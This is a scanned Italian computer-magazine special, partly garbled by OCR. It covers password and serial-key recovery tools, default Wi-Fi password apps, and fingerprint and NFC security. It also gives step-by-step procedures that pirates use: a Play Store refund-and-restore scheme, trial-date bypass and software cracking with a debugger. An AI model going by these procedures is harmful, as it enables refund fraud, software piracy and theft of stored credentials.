prevede che sul PC venga utilizzato un account 
Microsoft on-line (un po'come succede sugli 
smartphone): di conseguenza, la password e 
le impostazioni dell'account sono salvate su 
un server Microsoft e non più fisicamente sul 
computer. Quando accediamo al PC con un 
account remoto, possiamo scaricare app dal 
Windows Store, eseguire il backupdei nostri dati 
usando spazio di archiviazione cloud gratuito 
(OneDrive) e mantenere aggiornati e sincroniz¬ 
zati dispositivi, foto, amici, giochi, impostazioni, 
musica e così via. Pertanto, nei PC in cui è atti¬ 


vato un account remoto al posto di uno locale, 
non saremo in grado di disattivare la password 
di accesso al sistema con i metodi appena il¬ 
lustrati. Per controllare se abbiamo usato un 
account Microsoft per l'accesso, oppure uno 
locale, puntiamo con il mouse sul bordo destro 
dello schermo, cucchiamo su Impostazioni e 
quindi Modifica impostazioni PC. Andiamo 
su Account/ll tuo account. Se compaiono le 
parole Account locale, insieme al link Collega 
a un account Microsoft, sul PC è in esecuzione 
un account locale; se invece vi è l'indirizzo e-mail 
con tanto di immagine del profilo, allora stiamo 
utilizzando un account on-line Microsoft. 
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Codici seriali: recuperali cosi 

Grazie allo “Scova password” di Win Magazine possiamo recuperare anche i codici seriali smarriti 
dei software commerciali già installati sul computer. Vediamo assieme come procedere. 



^ Tutti i tool necessari 

•\ Accediamo alla sezione Speciali del Win CD/DVD-Rom: qui troveremo 
tutti i software necessari al recupero delle informazioni sull’installazione 
di software commerciali come Office o Windows, oppure utili per bypassare le 
password memorizzate nei browser e nei Client di posta elettronica. 



^ Con e senza installazione 

Cucchiamo sul nome del tool che ci interessa per visualizzarne la recen¬ 
sione, poi su Salva/lnstalla per archiviare il corrispondente archivio ZIP 
sull’hard disk. Scompattiamolo ed eseguiamo l'EXE contenuto all'interno per 
installare o avviare (qualora non richieda installazione) il software. 



A seconda della versione di Windows installata sul 
nostro PC (32 o 64 bit), eseguiamo il file per il 
recupero del seriale di Office corretto [productKe- 
yOffice_32o productKeyOffice_64.exdi. Una vol¬ 
ta avviato, comparirà il seriale di installazione della 
suite: annotiamolo per riusarlo in seguito. 


Il seriale di Windows 



Il seriale di installazione del sistema operativo è 
generalmente stampato su un adesivo attacca¬ 
to sul case del nostro computer, ma con il tempo 
può deteriorarsi e scollarsi: per recuperarlo, quindi, 
avviamo il file productkey.exe e annotiamoci in un 
posto sicuro il seriale mostrato in chiaro. 



Per scovare le password salvate nel browser pre¬ 
ferito, usiamo WebBrowserPassView, che ci resti¬ 
tuirà tutte le password in un istante. Eseguiamo 
dunque il file EXE corrispondente con un doppio 
clic del mouse: dalla schermata principale recu¬ 
periamo le password che avevamo dimenticato. 


Password della posta 


Password file RAR/PDF 


Password file Word/Excel 



Eseguiamo il file mailpv.exe. appena avviato 
mostrerà subito tutti gli account salvati nel Client 
di posta elettronica, con le relative password. Fun¬ 
ziona con tutti i maggiori software come Outlook, 
Mozilla Thunderbird, Yahoo! Mail, Hotmail/MSN, 
Windows Live e Gmail di Google. 


Per superare le password usate a protezione dei 
file RAR, ZIP e PDF installiamo Appnimi RAR Pas¬ 
sword Recovery oppure Appnimi PDF Password 
Recovery. Al termine, avviamo il tool che ci inte¬ 
ressa, selezioniamo il file protetto da password e 
clicchiamo Start per visualizzarla in chiaro. 


Per sbloccare i file DOC e XLS Installiamo Appni¬ 
mi Word Password Recovery. Avviamolo, selezio¬ 
niamo con Select il file da sproteggere, clicchiamo 
Start e attendiamo. Se ricordiamo alcuni dettagli 
della nostra password come la sua lunghezza, pos¬ 
siamo impostarla per risparmiare tempo. 


Speciali Win Magazine 73 


































































C* A scuola di hacker 


Fai da te | Lo scova password | 



IL WI FI SI APRE 
CON ANDROID 


Se non ricordiamo 
più la password del 
nostro router di casa, 
è possibile recupe¬ 
rarla anche grazie al 
nostro smartphone e 
all'applicazione gra¬ 
tuita WPA Tester, che 
può essere scaricata 
gratuitamente da 
www.winmagazine. 
it/link/2795. Instal¬ 
liamola tappando 
sull'APK appena 
scaricato e avviamola. 
Accettiamo II disdai- 
mere attendiamo che 
termini la scansione 
automatica delle 
reti. Tra tutte le Wi-Fi 
disponibili, cerchiamo 
la nostra. Se appare di 
colore verde, possia¬ 
mo tentare di recupe¬ 
rare la password sem¬ 
plicemente tappando 
sul nome corrispon¬ 
dente. Se invece la 
rete è di colore rosso, 
non abbiamo alcuna 
possibilità. Se non ab¬ 
biamo mai cambiato 
la password del router 
(lasciando quella di 
default) e il nostro 
router appartiene ad 
una marca/serie di cui 
si conosce l'algoritmo 
di generazione dei 
codici, l'app genererà 
la password e ci con¬ 
netterà direttamente 
alla rete Wi-Fi. 


Per alcuni modelli di router, la password del pannello di controllo può essere facilmente 
recuperata grazie al software gratuito Ufo-wardriving. Ecco la procedura per utilizzarlo al meglio. 



-x II segugio delle password 

■j Installiamo Ufo-Wardriving (presente sul Win DVD-Rom). 

Questo programma ci permetterà di recuperare la pas¬ 
sword di default di alcuni modelli di modem/router conosciuti e 
molto diffusi. Se la password del router è stata cambiata, però, 
non sarà più possibile ottenerla. 


^ La scansiona è automatica 

Avviamo il software e dal menu Strumenti in alto 
(oppure premiamo Ctrl+S sulla tastiera), selezioniamo 
la voce Scanner, in questo modo attiveremo la modalità di scan¬ 
sione che ci permetterà di visualizzare tutte le reti wireless nelle 
immediate vicinanze della nostra scheda di rete. 

Ecco visualizzati i dati 

(TTaccesso alle reti Wì-Fi 

Occhio alla parte destra della schermata, nella 
sezione Reti, verranno identificate le connessioni dispo¬ 
nibili con i seguenti colori: in rosso o arancio quelle con 
la password non recuperabile, in verde quelle facilmente 
accessibili. Ovviamente verranno generate le password 
di default: se è stata cambiata, non saremo più in gra¬ 
do di recuperarla. 



NON TUTTO È COSÌ SEMPLICE COME SEMBRA 


La password della nostra rete Wi-Fi viene generata in auto¬ 
matico da un particolare algoritmo, durante l'installazione 
del router da parte del gestore telefonico. È facile intuire 
che, se conosciamo tale algoritmo, saremo in 
grado anche noi di generare la password. 

Tale algoritmo però, varia in base al 
modello, alla marca del router e al 
nome della rete (SSID): per questo 
motivo, è stato svelato e reso noto so¬ 
lo per alcune serie di router. Per i restanti 
modelli, o quelli in cui la password è stata 
cambiata dall'utente, è necessario l'utilizzo 
della tecnica cosiddetta di attacco brute force. 

Tale tecnica utilizza dei file di testo, detti dizionari, 
che contengono tutte le password possibili, provan¬ 
dole ad una ad una, fino a trovare la parola chiave 
corretta. Il brute force, presenta però almeno due 
grossi problemi: il primo è derivante dal fatto che la password 
può essere ricavata se e solo se è presente in questo set di 


chiavi (dizionario) che, pertanto, deve ospitare migliaia di 
combinazioni possibili, raggiungendo spesso dimensio¬ 
ni spropositate. Il dizionario delle possibili password dei 
router Alice/Telecom, ad esempio, hanno una 
dimensione di circa 3 TB: per aprire un file 
di testo di queste dimensioni avremo 
bisogno di un hardware certamente 
superiore ad un normale PC. Il secon¬ 
do problema derivante dall'utilizzo 
dei dizionari deriva dal tempo in cui gli 
attuali computer sono in grado di scovare la 
password corretta. Sempre prendendo come 
esempio una rete Alice (di una serie non nota) e 
supponendo di avere a disposizione una macchina 
con hardware di ultima generazione, il tempo neces¬ 
sario per ottenere la password può variare da pochi 
secondi (nel caso in cui la password sia tra le prime 
parole del file) fino a 150 anni (se la password corretta è tra 
le ultime del file dizionario)! 
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COSI GLI HACKER SUPERANO LE PROTEZIONI DEL WINDOWS STORE 


Con la versione 8 di Windows, Microsoft ha introdotto 
molte novità tra cui uno Stare on-line che d permette di 
scaricare e installare, direttamente sul computer, giochi 
e applicazioni, proprio come accade sugli smartphone. 
Ovviamente gli hacker non sono rimasti a guardare e 
hanno scovato un metodo per scaricare gratis le app a 
pagamento. In pratica, sfruttano il software Windows 
Stare Service Crack (WSServiceTokens Extractor) che, 
utilizzando un algoritmo di brute force, permette 
loro di validare l'acquisto fittizio di un'applicazione. 
Il funzionamento è abbastanza semplice: quando si 
acquista un'applicazione all'interno dello stare viene 
generato un 'token" ovvero un codice univoco che 


attesta l'avvenuta transazione e che quindi delibera il 
download dell'app in versione complete. Per ottenere 
in maniera"illecita"il token, l'hacker scarica la versione 
di prova dell’applicazione da "acquistare" quindi, avvia 
il software WS Service, che tramite attacco brute force 
estrae la chiave d'acquisto e l'app passerà da versione 
di prova a versione completa. A quanto pare Microsoft 
ha scoperto la falla ed è subito corsa ai ripari: infatti 
il software WSServiceTokens Extractor non funziona 
con la più aggiornata versione di Windows, la 8.1. Ma 
intanto sul sito ufficiale diTokens Extractorècomparso 
un annuncio in cui i pirati sostengono che entro il 
2015 nasceranno la nuova versione del loro software. 



Crack dei giochi Android 

Utilizzando un semplice escamotage, i pirati riescono ad utilizzare gratuitamente e senza alcun limite 
le app altrimenti scaricabili a pagamento dal Google Play Store. Ecco in che modo. 



4 II tool 
perii 

backub 

Innanzitutto, i pirati 
installano l’app Tìta- 
nium Backup in ver¬ 
sione gratuita: la uti¬ 
lizzeranno per effet¬ 
tuare i backup delle 
app scaricate. Veri¬ 
ficano, inoltre, che 
sullo smartphone 
siano attivi i permes¬ 
si di root, in modo 
da potere effettua¬ 
re anche il backup 
delle Impostazioni di 
sistema. 



-1 Serve la 
carfani - 

credito " 

I pirati associano 
quindi una carta di 
credito al Play Sto¬ 
re di Google e simu¬ 
lano l’acquisto di 
un’app a pagamen¬ 
to per accedere al 
pannello di confi¬ 
gurazione del Goo¬ 
gle Wallet. Quindi 
seguono le istruzioni 
a video e inserisco¬ 
no i dati della carta 
di credito e del legit¬ 
timo proprietario. 
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Shopping 

sfrenato 

A questo 
punto, i pirati posso¬ 
no acquistare l’ap¬ 
plicazione che gli 
interessa senza pre¬ 
occuparsi della spe¬ 
sa sostenuta: san¬ 
no, infatti, che han¬ 
no 15 minuti di tem¬ 
po per completare la 
procedura, effettua¬ 
re il backup dell’app 
stessa e, successi¬ 
vamente, richiede¬ 
re il rimborso per... 
acquisto errato! 



Nova La jndier Prime 



I soldi 

tornano 

indietro 



Avviano quindi Tita- 
nium Backup ed 
effettuano il backup 
dell’applicazione appe¬ 
na installata, in modo 
da averne una copia 
“completa". Tornano 
quindi sul Play Store 
e dalla pagina dell'app 
cliccano Rimborso, 
seguendo i passi del¬ 
la procedura guidata 
mostrata a video. 



i Un’app da 
5 ripristinare 

Ottenuto 
il rimborso, il pira¬ 
ta ripristina il backup 
dell’applicazione che, 
non essendo più “di 
suo gradimento”, era 
stata disinstallata. Per 
ripristinare il backup 
contenente l’applica¬ 
zione, avviano Tita- 
nium Backup e, dalla 
voce Ripristina, sele¬ 
zionano il backup cre¬ 
ato in precedenza. 



Nuove Scelte dalla Redazione 
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Applica/ioni 


4 


In alternativa, i pirati 
installano un market 
alternativo, che per¬ 
mettono di scaricare 
le app a pagamento in 
maniera gratuita, sem¬ 
plicemente cercando¬ 
le e installandole. Il più 
diffuso è Aptoide, un 
multistore che effettua 
la ricerca in più market 
fino a recuperare l'app 
desiderata. 
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Meglio 
gli store 

unofficial 
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| Parliamo di... | Sistemi biometrici 


Il crack delle 


impronte digitali 



Su smartphone e notebook di nuova generazione sono 
sempre più diffusi i sistemi di accesso biometrici. 

Li abbiamo testati nei nostri laboratori scoprendo che... 


noi 0000101 ou 
1001010101100 
1000100100100 
10100101010010 
101000101001010 
101010100101001 
100101010101010 


N elle pagine precedenti abbiamo visto quanto 
è facile, utilizzando gli strumenti giusti, 
bypassare tutti i sistemi di protezione basati 
su password e codici seriali: in pochi clic riusciamo 
ad ottenere di nuovo l’accesso al nostro computer 
o ai file archiviati nell'hard disk. Se correttamente 
utilizzato, quindi, lo “Scova password" di Win 
Magazine può tornare molto utile e risolverci 
numerosi grattacapo. Il problema è che le tecniche 
mostrate nell’articolo sono le stesse utilizzate 
dai pirati informatici per intrufolarsi nei sistemi 
altrui o scardinare qualsiasi lucchetto digitale! Per 
questo motivo negli ultimi tempi, anche grazie alla 
continua evoluzione tecnologica, hanno iniziato 
a diffondersi i sistemi biometrici che, basati sul ri¬ 


conoscimento delle impronte digitali, promettono 
un livello di sicurezza nel controllo degli accessi 
ai vari dispositivi hardware mai visto prima d'ora, 
risparmiandoci, al contempo, anche la fatica di 
dover ricordare a memoria decine di password. 


Sicuri, ma non troppo 

Viene spontaneo chiedersi, però, quanto una 
piccola impronta digitale può davvero mettere al 
sicuro la nostra privacy. Timori, questi, che non 
sono poi così infondati: anche un'impronta digitale 
può essere "clonata"! Sembra un po’ uno scenario 
da film di spionaggio, ma si sa che la realtà spesso 
supera la fantasia. Con l’uscita dell’iPhone 5S pri¬ 
ma e del Samsung Galaxy S5 dopo, i sistemi biome¬ 



trici sono diventati accessibili 
anche al grande pubblico e, di 
conseguenza, hanno iniziato 
ad attirare le attenzioni dei 
pirati informatici. Su Internet, 
d’altro canto, hanno iniziato a 
comparire guide più o meno det¬ 
tagliate che spiegano proprio co¬ 
me bypassare questi nuovi sistemi 
di sicurezza utilizzando strumenti 
facilmente reperibili al ferramenta 
sotto casa. Ma è davvero così semplice 
scardinare questi sistemi di protezione? 

La risposta, per fortuna, è no, ma non per 
questo possiamo a dormire su sette cuscini 
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Clonare si può 

Abbiamo quindi voluto testare la reale efficienza 
del sistema di riconoscimento delle impronte 
digitali sia dell'iPhone 5S sia del Galaxy S5. Vi 
anticipiamo subito che è stato molto più sem¬ 
plice recuperare gli strumenti "da scasso" che 
non i due smartphone, visto il loro costo 
esorbitante! Abbiamo quindi fatto visita 
al ferramenta per acquistare una con fe- 
zione di pasta da modellare, un tubetto 
di silicone e un vasetto di colla vinili¬ 
ca, mentre da un negozio on-line ci 
siamo fatti spedire un sacchetto di 
lattice liquido. A cosa ci sono ser¬ 
viti? Per realizzare i calchi delle 
nostre impronte digitali. Con 
risultati strabilianti: in due casi, 
infatti, siamo riusciti a trarre in 
inganno il sistema di ricono¬ 
scimento del Galaxy S5! Ciò 
significa che anche i sistemi 
biometrici promettono tanto 
ma mantengono poco? Assolu¬ 
tamente no: i nostri test hanno 
confermato che la sicurezza 
che offrono è davvero elevata. 
In effetti, a meno di non avere 
attrezzature degne delle migliori 
serie TV americane, è davvero 
difficile riuscire a fare il calco 
dell'impronta digitale del¬ 
le dita di qualcuno. Però, 
come si suol dire: uomo 
avvisato, mezzo salvato... 



TUTTA LA VERITÀ SULLA TECNOLOGIA 
DI PAGAMENTO SENZA FILI NFC 



Se possediamo uno smartphone 
di ultima generazione abbiamo 
sicuramente notato che tra le 
funzioni integrate c'è NFC Que¬ 
sta sigla, acronimo di "Near Field 
Communication"(letteralmente 
"comunicazione in prossimità"), 
sta ad indicare un protocollo di 
trasmissione dei dati bidirezio¬ 
nale, wireless e a brevissima di- 
stanza. Tale tecnologia, presente 
anche sulle carte di pagamento 
"contactless", consente di effet¬ 
tuare transazioni, ovvero paga¬ 
menti, negli esercizi commerciali 
semplicemente avvicinando la 
carta (o lo smartphone) ad un 
apposito lettore, senza quindi 
dover digitare un PIN (almeno 
per pagamenti di piccola enti¬ 
tà). I dispositivi di pagamento 
NFC si stanno rapidamente dif¬ 
fondendo, basti pensare che in 
Italia le banche e le Poste Italiane 
hanno già emesso e distribuito 
ben 6 milioni di card di questo 
genere. Quello che si comincia 
a temere è però un possibile 
problema di sicurezza. Infatti, 


come già messo in evidenza in 
passato in alcune conferenze di 
tenute da hacker ed esperti del 
settore, adoperando dispositi¬ 
vi ad hoc chiunque potrebbe 
essere in grado di intercettare 
la carta o lo smartphone NFC 
di un utente che si trova nelle 
immediate vicinanze, rubarne 
i dati (numeri della carta, inte¬ 
statario, data di scadenza, ecc) e 
utilizzarli per effettuare acquisti 
in altri negozi abilitati a questo 
tipo di pagamento. Il problema, 
come confermato dall'esperto 
di sicurezza informatica Raoul 


Chiesa, non sta nella tecnologia 
NFC, di per sé sicura, quanto nel 
fatto che, in particolare nel no¬ 
stro Paese, non viene utilizzata la 
crittografia dei dati dai servizi di 
pagamento. In ogni caso i princi¬ 
pali operatori di telefonia mobile 
italiani hanno già lanciato le loro 
offerte relative ai pagamenti NFC 
garantendo transazioni criptate 
grazie ad algoritmi di crittografia 
dei dati. Le offerte generalmente 
consistono nel sostituire la vec¬ 
chia SIM con una con tecnologia 
NFC e neM'utilizzo di un app da 
installare sullo smartphone. 
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Giù le mani 
dai miei file 


Così puoi crittografare i dati salvati su disco e pendrive 
per renderli inaccessibili a spioni e ficcanaso 


D ocumenti, filmati, foto: i nostri 
dati non sono mai al sicuro da 
occhi indiscreti. Durante una 
pausa di lavoro, ad esempio, qualora 
ci allontanassimo dal PC, qualcu¬ 
no potrebbe provare ad accedervi e 
sbirciare tra file e cartelle del disco 
rigido. Immaginiamo poi cosa po¬ 


trebbe succedere se dimenticassimo 
incustodita da qualche parte una 
chiavetta USB sulla quale abbiamo 
salvato file personali. La soluzione 
per evitare questo tipo di evenienze è 
criptare i propri dati in modo tale che 
nessuno possa riuscire ad accedere 
al loro contenuto. Per farlo possiamo 


utilizzare un programma specifico 
come abysoft BASIC 11, in regalo per 
i nostri lettori (che trovi nell’interfac¬ 
cia principale del Win DVD-ROM), 
che consente di proteggere i file e 
criptarli mediante l'uso di password 
e persino di certificali digitali. Ecco 
come fare. 


Cosaci O 
occorre 


FACU 


SOFTWARE 
DI CRITTOGRAFIA 

ABYLON 
BASIC 11 

Lo trovi su: 0DVD 

Quanto costa: 

Gratuito per i lettori 
di Win Magagne 

Sito Internet 

www.abylonsoft.com 





Si parte con il setup 

fll Scompattiamo sul disco rigido l’archivio compresso Basici 1.zip (pre- 
I sente nell 'Interfaccia Principalede\ Win DVD-Rom) e facciamo doppio 
jUB clic sul file Basici 1.exe. Nella schermata di setup selezioniamo English 
dal menu a tendina, quindi premiamo OK. 


Richiediamo il codice 

Q Seguiamo la procedura guidata: al termine leviamo tutte le spunte 
I delle opzioni visualizzate e premiamo dose. Quando compare il mes- 
I J saggio del completamento dell'installazione cucchiamo su No Nella 
schermata di registrazione facciamo clic Invece su Requestregistration data. 



Una veloce registrazione 

Si aprirà una pagina Web con un form in cui inserire il nostro nome e la 
nostra e-mail, quindi cucchiamo su Request registry key! e su OK. 
Riceveremo un'e-mail contenente CD-Keye Registry-Key: copiamo¬ 
li nei box della schermata del programma e premiamo Activate, quindi su dose. 


Crintiamo usando una password 

a A questo punto possiamo subito procedere con la crittografia dei file. Per 
criptare con una password una cartella o un gruppo di file selezioniamoli, 
dicchiamo su di essi con il tasto destro del mouse e cucchiamo sulla voce 
abylon SYMM CRYPT, quindi su Encrypt. Cucchiamo su Yes e poi su Continua. 
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& abylon PASSWORD (0.jpg.cr2) 




Posswurd 

Pleaae enter your pasjwod to acce» 'Ojpg a?' 


fili-■ 

èe 

Actrvate PASSWORD - SCRAMBLER 


Kèy-based password ertry 


Q* 


<9 •«**>- WWH A». W. A1 JCfNCf 

ori; w 
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u 


^ **cr SCTTIN6SIM. ■ f*MTC UCCNCt 


o° 
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| START 


* 


abytoa MAMAiCB (Acv • PRIVATE UCENCQ 




Una parola chiave complessa 

Nella schermata successiva digitiamo una 
password (la lunghezza della striscia verde 
in alto ne indica la complessità) in entram¬ 
bi I campi, quindi premiamo il pulsante Ok. Al ter¬ 
mine confermiamo con Yes all. Al termine, tutti i 
file saranno criptatl e protetti da sguardi Indiscreti. 


Decriptiamo tutto in un die 

Per decriptare uno o più file, selezioniamo¬ 
li, clicchiamo su di essi con il tasto destro 
e facciamo clic sulla voce abylon SYMM 
CRYPT/Decrypt. Ci verrà chiesto questa volta di 
inserire la password usata per la captazione: digi¬ 
tiamola nell'apposito box e premiamo Ok. 


Un certificato di sicurezza 

Per criptare invece dei file utilizzando un 
certificato di sicurezza, dobbiamo prima 
crearlo e importarlo in Windows. Clicchiamo 
due volte sull’Icona di abylon BASIC presente in 
basso sulla System tray e poi facciamo doppio clic 
sulla voce abylon SELFCERT. 





Inseriamo i dati e la validità 

Q Riempiamo i vari campi della schermata 
con i nostri dati, selezioniamo IT-ltalien in 
—M Country, in Time (Days) indichiamo i gior¬ 
ni di validità del certificato e proseguiamo con Cre¬ 
ate. Clicchiamo Yes, digitiamo in entrambi I box di 
testo una password per il certificato e diamo Ok. 


L’importazione dei certificato 

a Scegliamo una cartella in cui salvare il cer¬ 
tificato, digitiamo un nome e premiamo Sal¬ 
va. Clicchiamo Yes per importare il file in 
Windows, quindi premiamo^ vanti, poi ancora/t van¬ 
ti, digitiamo la password del certificato, selezioniamo 
tutte le opzioni presenti e clicchiamo Avanti. 


Un livello di protezione elevato 

E t Selezioniamo la voce Mettere tutti i certi- 
I ficati nel seguente archivio e premiamo 
* Sfoglia. Scegliamo Personale, quindi con¬ 
fermiamo con OK e premiamo Avanti, quindi Fine. 
Clicchiamo su Imposta livello protezione, selezio¬ 
niamo Alto e premiamo Avanti. 




Aggiungiamo anche una password 

A questo punto dobbiamo digitare in Password e in Conferma pass¬ 
word una ulteriore password di protezione che ci verrà chiesta quan¬ 
do decripteremo un elemento. Fatto ciò, completiamo questa fase 
premendo il tasto Fine, quindi clicchiamo su O/Ce poi ancora su OK. 


E ora criptiamo ogni cosa! 

Selezioniamo con il tasto destro i file da criptare e clicchiamo su abylon 
HYBRID CRYPT/Encrypt. Per decriptare elementi crittografati con que¬ 
sto metodo, selezioniamoli col tasto destro e clicchiamo su abylon 
HYBRID CRYPT/Decrypt, digitiamo la password del certificato e premiamo OK. 
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“Così ti genero 
i codici seriali” 

L’hacker ci spiega come fa a sbloccare la demo di software 
e giochi commerciali per ottenere versioni complete 



I numeri, come sempre, parlano chiaro: il 
50% dei software commerciali in Italia 
è contraffatto (a livello europeo le per¬ 
centuali sono più basse, ma comunque 
non c’è di che rallegrarsi): in pratica, un 
programma su due di quelli installati sui 
computer di nostri connazionali è "pira¬ 
ta”! È normale, quindi, che le principali 
software house cerchino in tutti i modi di 
contrastare questa tendenza, incontran¬ 
do non poche difficoltà: per ogni nuovo 


sistema di protezione anticopia, infatti, 
c’è sempre qualche smanettone pronto 
a mettersi all’opera per rilasciare subito 
gli strumenti necessari per bypassarlo. A 
confermarcelo è un hacker incontrato sui 
forum underground della Rete, che ci ha 
illustrato anche i tanti modi per entrare in 
possesso di un software pirata sono molti. 


Il crack è servito! 

Un tempo, ci racconta l’hacker, i program¬ 
mi contraffatti venivano scambiati tra 
amici e colleghi o acquistati sulle ban¬ 
carelle dei mercatini a prezzi stracciati 
se confrontati col valore reale. Negli 
ultimi anni, soprattutto grazie alla 
diffusione della banda larga, la 
risorsa più battuta è senz’altro 
la Rete. Proprio come avviene 
per film e musica, le ricerche 
nelle reti P2P restituiscono 
risultati per tutte le esigenze. 
Ricerche nelle reti Torrent 


consentono ai pirati di reperire ogni gene¬ 
re di programma commerciale completo 
di crack e istruzioni per applicarlo. Anche 
forum, blog e siti Web, cui si arriva con 
una semplice ricerca su Google, sfrut¬ 
tando la banda offerta dai servizi di file 
hosting, possono contare su una veloce 


5 TECNICHE PER 
GENERARE I CODICI 

Il termine crack racchiude tutti i 
metodi di attivazione illegale di un 
software, ma in realtà ne esistono di 
diverse categorie. Eccole in dettaglio 

PATCH Indica una tipologia si crack che consiste 
nella sostituzione dei file originali del program¬ 
ma. I nuovi sono opportunamente modificati 
per non richiedere l'attivazione del software. 

NO-CD/DVD Tecnica utilizzata soprattutto 
nel mondo dei videogame pirata: la modifica 
all’eseguibile bypassa il controllo del supporto, 
consentendo l'avvio del titolo senza disporre 
del disco originale. 

LOADER In questo caso, il crack viene eseguito 
al volo durante il caricamento dell'eseguibile. 
Non alterando i file originali, questo tipo di crack 
supera anche i controlli anticopia CRC (Controllo 
a Ridondanza Ciclica) usati dai sistemi operativi. 

KEYGEN Alcuni software nascondono l'algo¬ 
ritmo di generazione del seriale alllnerno del 
programma stesso. Questo permette ai cracker 
di realizzare tool (i keygen, appunto) che estrag¬ 
gono dal software la chiave di attivazione. 

NOLIMIT La modifica della data di sistema 
permette al crack di ingannare le versioni trial 
dei software commerciali, facendogli credere 
che non sia ancora scaduto il periodo di prova. 
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Lunga scadenza per i software 

Grazie al tool RunAsDate i pirati riescono ad allungare all'Infinito le versioni di prova dei software a pagamento. 
Lo scopo di RunAsDate è infatti quello di ingannare la verifica della data di sistema. Ecco come. 



^ I pirati trovano tutto su Internet 

■j II pirata non fa fatica a trovare RunAsDate sul Web: una ricer¬ 
ca su Google lo porta facilmente al sito dove potrà scaricare 
l'applicazione. Estratto l’archivio, il pirata avvia il software, che non 
richiede installazione. 


La scadenza è stata posticipata 

2 II pirata sceglie il software commerciale da “sbloccare”: per far- 
lo, naviga alla ricerca del collegamento usato per avviarlo. Indica 
quindi una data precedente, anche di un solo giorno, rispetto a quella 
di scadenza del periodo di prova e applica le modifiche. 


distribuzione del materiale opportuna¬ 
mente contraffatto. I file che si scaricano 
da queste risorse, generalmente, consi¬ 
stono di archivi compressi o immagini in 
formato ISO di CD e DVD che, insieme ai 
file d'installazione del programma, com¬ 
prendono quanto occorre per crackarlo 
o attivarlo illegalmente. In alternativa, 
è possibile anche servirsi delle versioni 
trial disponibili sul sito Web dei software, 
scaricando dai suddetti canali "proibiti" 
solo la patch di attivazione. Conclusa l'in¬ 
stallazione del software, al pirata basta 
seguire le istruzioni che illustrano la pro¬ 
cedura di attivazione del crack. Poiché tali 
procedure variano a seconda del software, 
anche quelle illegali si differenziano per 
tipologia e modalità di applicazione. 

• Nel caso di attivazione mediante crack, 
il pirata sostituisce il file eseguibile ori¬ 
ginale del programma con un file, appa¬ 
rentemente simile, riscritto dal cracker 
(colui che crea il crack) per bypassare la 
richiesta del codice di attivazione. 

• Meno invasivi ma altrettanto validi, 
i keygen sono tool che consentono di 
generare un serial per arrivare alla va- 
lidazione dell’installazione tramite la 
normale procedura di attivazione. Il 
keygen può essere utilizzato solo per 
quei programmi che nascondono l’al¬ 


goritmo di generazione delle chiavi nel 
programma stesso. 

• Dove non arrivano crack e keygen, ci 
pensano i loader e i NoLimit. Particolar¬ 
mente adatti per bypassare l’attivazione 
di software e sistemi operativi Micro¬ 
soft, i loader riescono a superare anche 
i controlli CRC (Controllo a Ridondanza 
Ciclica) che i sistemi antipirateria dei 
software applicano su se stessi, mentre 
i NoLimit, alterando la data del sistema, 
consentono di allungare all’infinito le 
versioni di prova dei software commer¬ 
ciali. Insomma, nonostante gli sforzi, le 


software house riescono a malapena ad 
arginare il problema della pirateria. 

Non tutto è illegale 

Il motivo principale per cui in tanti si spin¬ 
gono oltre le colonne d'Èrcole della legalità 
per approdare sui lidi sconosciuti (e a volte 
pericolosi) della pirateria è sicuramente 
il prezzo esorbitante di alcuni software 
commerciali, giustificato dalle ingenti 
risorse richieste per il suo sviluppo, che 
può arrivare anche a diverse migliaia di 
euro. Tuttavia, in molti casi, gli utenti uti¬ 
lizzano software pirata solo perché non ► 


SOFTWARE PORTABLE COL CRACK DENTRO 


Uno dei siti più utilizzati dai pirati 
informatici è PortableAppz, da 
cui è possibile scaricare versioni 
portable di molti software, ma 
anche programmi commerciali 
crackati che non necessitano di in¬ 
stallazione per funzionare. Questi 
ultimi sono, in realtà, dei normali 
archivi compressi autoestraenti 
(in formato PAF): basta solo indi¬ 
care la cartella o il drive di desti¬ 
nazione, dopodiché per avviare i 
programmi si ricorre all'EXE che si 
trova all'interno della cartella. Per 
crearli, i pirati usano strumenti 


come Portable App Creator o 
VMwareThinApp. Ricorrendo a 
questi strumenti, sono in grado di 
registrare tutte le modifiche che 
avvengono nel sistema durante 
l'installazione e l'attivazione di un 
software. L'archivio restituito da 
WmVareThinApp, ad esempio, 
permette di usare il software su 
qualunque PC senza bisogno 
di ripetere setup e attivazione. 
Si tratta di programmi portable 
a tutti gli effetti che, assieme ai 
file necessari per l'esecuzione, 
integrano anche il serial key con 


il quale sono stati attivati. Oltre ai 
software commerciali, i pirati 
usanoquesto stratagem¬ 
ma per confezionare 
anche videoga 
me proi 
l'uso. 
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conoscono prodotti alternativi disponibili 
gratuitamente. Eppure, basterebbe solo 
guardarsi attorno per scoprire un mondo 
di eccellenti programmi open source che 
non hanno nulla da invidiare a blasonati 
e costosi software con analoghe caratteri¬ 
stiche. Software come The GIMP, InfraRe- 
corder, PeaZip o LibreOffice, solo per fare 
qualche esempio, offrono gratuitamente 
gli stessi strumenti che Photoshop, Ne¬ 
ro, WinRar o MS Office si fanno pagare 
profumatamente. Ci sono poi i regali che 
Win Magazine fa ogni mese ai suoi lettori, 
offrendo codici di attivazione e promo¬ 
zioni per utilizzare a costo zero i migliori 
software commerciali per Windows. Così 
come il crimine, anche i software pirata 
non pagano e possono metterci in un mare 
di guai. Farla franca con la legge non è 
difficile, ma rischiare di beccarsi un virus 
o aprire le porte del nostro PC agli stessi 
pirati che hanno crackato il software non è 
un’eventualità così rara: d'altronde, basta 
farsi un giro sui siti che diffondono crack 
per essere letteralmente subissati dalle 
finestre popup che segnalano la presenza 
di worm, trojan e spyware di ogni tipo. 
Tirando le somme, la legalità resta sempre 
la strada migliore per non complicarsi 
inutilmente la vita. 


Nessun software resiste 


Usando gli 
strumenti 
giusti e un 
po’ di pratica, 
anche un 
pirata alle 
prime armi 
è in grado 
di crackare 
un software 
commerciale. 

E per farlo, non 
gli servono 
particolari 
competenze 
o conoscenze 
tecniche. 
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La cassetta degli attrezzi usata dal pirata 

I pirata si procura un debugger come OllyDbge procede all’installa¬ 
zione del software che intende crackare. Awiato OllyDbg con privilegi 
di amministratore, il pirata va alla ricerca della posizione del collegamento che 
avvia il programma, quindi attende che venga caricato nel sistema. 


IL FIREWALL DI WINDOWS È IL CRACK PREFERITO DAI PIRATI 


|f Windows Firewall con prete; o"« avanzata 
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Q Adobe Encote 
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O Adobe Flash 
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G Adobe Illustrato. 
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G Adobe lnOeugn 
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G Adobe Media Encodtr 
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G Adobe Photoshop C$4 


Qualsiasi 

G Adobe Premiere Pro 
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G Adobe Soundbooth 


Quel neu 

G Adobe Updatei 


Qualsiau 


